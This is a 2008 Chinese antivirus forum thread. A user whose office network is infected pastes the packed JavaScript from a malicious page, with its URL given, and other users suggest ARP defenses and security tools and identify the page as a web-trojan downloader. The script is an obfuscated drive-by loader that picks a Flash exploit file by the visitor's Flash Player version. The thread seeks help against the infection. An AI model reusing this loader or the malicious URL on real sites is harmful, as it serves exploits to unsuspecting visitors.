瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 恶意网站URL: http://do.qwertyy.cn/ihhh.html 中招了。
紧急措施 - 2008-11-17 13:42:00
单位网内所有机子打开网页有问题,我已经把SCRIPT也打开了。大家看看



<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 7="q";5 4=p.s.t();3(4[\'n\']==9){g.h(\'i\').j="";3(4[\'6\']==m){5 2=c d("./l.b","a","0.1","0.1","9","#8");2.e(7)}f 3(4[\'6\']==o){5 2=c d("./k.b","a","0.1","0.1","9","#8");2.e(7)}f 3(4[\'6\']==r){5 2=c d("./x.b","a","0.1","0.1","9","#8");2.e(7)}f 3(4[\'6\']==z){5 2=c d("./B.b","a","0.1","0.1","9","#8");2.e(7)}f 3(4[\'6\']==A){5 2=c d("./y.b","a","0.1","0.1","9","#8");2.e(7)}f 3(4[\'6\']==v){5 2=c d("./u.b","a","0.1","0.1","9","#8");2.e(7)}f 3(4[\'6\']>=w){3(g.h){g.h(\'i\').j=""}}}',38,38,'||so|if|version|var|rev|Same|000000||mymovie|swf|new|SWFObject|write|else|document|getElementById|flashversion|innerHTML|i64|i115|115|major|64|deconcept|flashcontent|47|SWFObjectUtil|getPlayerVersion|i16|16|124|i47|i28|45|28|i45'.split('|'),0,{}))
</script>

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
左眼球 - 2008-11-17 14:38:00
是不是arp攻击啊,装arp防火墙了没
大将风度 - 2008-11-17 14:43:00
建议安装畅游巡警进行防御!
下载地址:http://www.sucop.com/download/secplugin.html
另外请你上传SREng的日志!
十二月的雪 - 2008-11-17 15:15:00
:default12: 一看就是网布木马的下载地址
十二月的雪 - 2008-11-17 15:15:00
超恶心的网马
afei20082003 - 2008-11-17 17:46:00
我们公司也是这个病毒,到处都是,求解.
kdm - 2008-11-17 19:33:00
试过了用楼主的办法不行,一直报警,根除不了!
1
查看完整版本: 恶意网站URL: http://do.qwertyy.cn/ihhh.html 中招了。